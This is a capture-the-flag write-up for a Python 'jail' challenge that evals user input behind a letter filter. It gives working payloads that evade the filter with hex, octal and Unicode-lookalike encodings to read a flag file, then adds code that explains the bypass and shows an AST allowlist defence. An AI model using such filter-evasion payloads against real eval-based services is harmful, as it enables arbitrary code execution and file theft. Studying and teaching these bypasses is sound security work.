BYUCTF 2023 – abcdefghijklm
Author: Lumy
abcdefghijklm
You can't use any of the first 13 letters of the alphabet EXCEPT for the first 4 letters of your input
OH and don't make it too long
Source code
inp = input("code > ").lower()
eval((inp[:4]+__import__("re").sub(r'[a-m]','',inp[4:]))[:80])
Solution
The filter leaves the first 4 characters of the input untouched, so we can spell either eval or exec there.
Here is the payload we would like to run:
exec("print(open('flag.txt').read())")
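To get around the letter filter, we can write the forbidden characters as hex and octal escapes inside the string. The l is written in octal because its hex form, \x6c, contains a filtered letter: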
exec("pr\x69nt(op\x65n('\x66'+'\154'+'\x61\x67.txt').r\x65\x61\x64())")
Or use octal escapes throughout:
exec("pr\151nt(op\145n('\146\154\141\147.txt').r\145\141\144())")
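Finally, we can also bypass the letter filter using Unicode: Python applies NFKC normalization to identifiers, so lookalike letters that fall outside a-m still resolve to exec, print, open and read. String literals are not normalized, so the file name keeps its escapes:
𝘦𝘹𝘦𝘤("𝘱𝘳𝘪𝘯𝘵(𝘰𝘱𝘦𝘯('\146\154\141\147.txt').𝘳𝘦𝘢𝘥())")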
Website for string to octal encoding: onlinestringtools.com/convert-string-to-octal
Website for string to hex encoding: string-functions.com/string-hex.aspx
Website for string to Unicode encoding: qaz.wtf/u/convert.cgi
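Why the character filter fails, as an added example that is not part of the original write-up: the filter inspects raw characters, while the parser decodes string escapes and NFKC-normalizes identifiers before anything runs. The names compiler_view and is_arithmetic_only are hypothetical, and the allowlist assumes the service only needs to evaluate arithmetic.

```python
import ast
import re

def challenge_filter(inp):
    """The page's filter without the eval: keep 4 chars, strip a-m, cap at 80."""
    inp = inp.lower()
    return (inp[:4] + re.sub(r"[a-m]", "", inp[4:]))[:80]

def compiler_view(src):
    """Return (names, strings) as the parser sees them: identifiers are
    NFKC-normalized and string escapes are already decoded."""
    names, strings = set(), []
    for node in ast.walk(ast.parse(src, mode="eval")):
        if isinstance(node, ast.Name):
            names.add(node.id)
        elif isinstance(node, ast.Attribute):
            names.add(node.attr)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            strings.append(node.value)
    return names, strings

# Hypothetical policy: numeric literals and + - * / only (no names, calls, **).
ALLOWED = (ast.Expression, ast.BinOp, ast.UnaryOp, ast.Constant,
           ast.Add, ast.Sub, ast.Mult, ast.Div, ast.USub)

def is_arithmetic_only(src):
    """Allowlist AST node types instead of blacklisting source characters."""
    try:
        tree = ast.parse(src, mode="eval")
    except (SyntaxError, ValueError):
        return False
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED):
            return False
        if isinstance(node, ast.Constant) and type(node.value) not in (int, float):
            return False
    return True

# Octal payload from the write-up (raw string keeps the backslashes).
OCTAL = r'''exec("pr\151nt(op\145n('\146\154\141\147.txt').r\145\141\144())")'''
# Constructed sample: "exec" in mathematical sans-serif italic letters.
UNICODE = "".join(chr(0x1D622 + ord(c) - ord("a")) for c in "exec") + "('1')"

if __name__ == "__main__":
    for payload in (OCTAL, UNICODE, "2 * (3 + 4)"):
        kept = challenge_filter(payload)
        print(kept == payload, compiler_view(kept), is_arithmetic_only(kept))
```

Both payloads pass through the regex unchanged, yet the parser reports the name exec for each; the AST allowlist rejects them because it checks what the compiler will execute rather than how the text is spelled.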